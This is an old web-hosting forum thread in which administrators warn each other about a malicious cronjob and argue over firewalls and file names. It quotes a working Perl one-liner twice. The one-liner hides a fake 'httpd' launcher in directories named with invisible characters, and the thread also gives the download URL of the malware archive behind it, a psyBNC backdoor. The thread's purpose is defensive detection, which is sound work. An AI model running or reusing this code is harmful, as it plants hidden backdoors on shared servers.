If you allow cronjobs

**dgbaker** · 05-17-2003 03:23 PM

If you allow users to setup cronjobs watch for the following.

perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)

In most cases this user is an innocent victim and it is actually another user doing the real damage.

The script that is being installed is this one.

http://ibitzica.com/m.tgz

Look for this in home directories or search for the CRONEXE it is one of the variables that is setup in the php install file.

If you are seeing abnormal apache failures, extreme bandwidth usage, or suspect any backdoors or such check for this. It will be trying to setup PSYBNC.SYSTEM.PORT1=1124

So make sure your firewalls are blocking this port.

**FWC** · 05-17-2003 03:26 PM

Thanks for the tip, David. Something else to keep an eye on.

**jackal** · 05-17-2003 04:06 PM

Hey David, we had a signup the other day for a yearly package that had this installed we found it within 30 minutes. We sent him around 5 emails no reponse then we suspended the account. That made him come out from hiding. We actually talked with him on ICQ after we found it. But this was a strange guy with strange responses. We finally just deleted his account.

**dgbaker** · 05-17-2003 04:19 PM

Good find!

Our biggest thing with this was it was able to install in two other peoples home directories.

Make sure to do good thorough search for hidden directories like .x and search for the max.pl script as well.

**jamesbond** · 05-17-2003 04:53 PM

Originally posted by dgbaker
Our biggest thing with this was it was able to install in two other peoples home directories.

That's not good

How did they manage to do that? And how to prevent this?

**jackal** · 05-17-2003 08:45 PM

No max.pl found David. Sent you a pm David

**dgbaker** · 05-17-2003 08:52 PM

Originally posted by jamesbond
That's not good

How did they manage to do that? And how to prevent this?

That's the lovely thing with that script, it allows that to happen.

**sexy_guy** · 05-18-2003 12:38 AM

Originally posted by dgbaker
If you allow users to setup cronjobs watch for the following.

perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)

In most cases this user is an innocent victim and it is actually another user doing the real damage.

The script that is being installed is this one.

http://ibitzica.com/m.tgz

Look for this in home directories or search for the CRONEXE it is one of the variables that is setup in the php install file.

If you are seeing abnormal apache failures, extreme bandwidth usage, or suspect any backdoors or such check for this. It will be trying to setup PSYBNC.SYSTEM.PORT1=1124

So make sure your firewalls are blocking this port.

Im sorry but if you have a decent firewall that only opens what you need why would we be careful with port 1124? I dont know about you but i dont open usused ports.

**sexy_guy** · 05-18-2003 12:44 AM

Originally posted by dgbaker
Good find!

Our biggest thing with this was it was able to install in two other peoples home directories.

Make sure to do good thorough search for hidden directories like .x and search for the max.pl script as well.

FYI max.pl is part of a the webmin suit that we use on our server. A check resulted in the following;

root@srv05 [/var/log]# locate max.pl
/usr/local/src/webmin-1.060/useradmin/help/max.pl.html

**dgbaker** · 05-18-2003 07:13 AM

Originally posted by sexy_guy
Im sorry but if you have a decent firewall that only opens what you need why would we be careful with port 1124? I dont know about you but i dont open usused ports.

Umm, neither do we, but is informing others bad thing now? Also if your using software firewalls on your server they can be taken down. Any exploit that gets through apache and can gain root can change that port. Checking your ports regularily is called being diligent with your server security.

Just because a firewall blocks it I am still not going to allow users to even try using this stuff. For us and the other clients I deal with, there is a zero tolerance for any cr@p.

If you're not checking for these types of things, firewall or not it is no wonder you seem to have an abundant more problems then most of us have encountered.

**dgbaker** · 05-18-2003 07:16 AM

Originally posted by sexy_guy
FYI max.pl is part of a the webmin suit that we use on our server. A check resulted in the following;

root@srv05 [/var/log]# locate max.pl
/usr/local/src/webmin-1.060/useradmin/help/max.pl.html

So, does that mean if I name a file something that belongs to another program I can run it freely on your system no matter what the code it? Cool, can I have an account with you?

Also that is not max.pl but is max.pl.html see the difference?

html versus perl = two different languages

LinkBack

Thread Tools

If you allow cronjobs

Re: If you allow cronjobs

Re: Re: If you allow cronjobs

CronJobs

Cronjobs not saving

Cronjobs

Cronjobs

None of my Cronjobs are working :(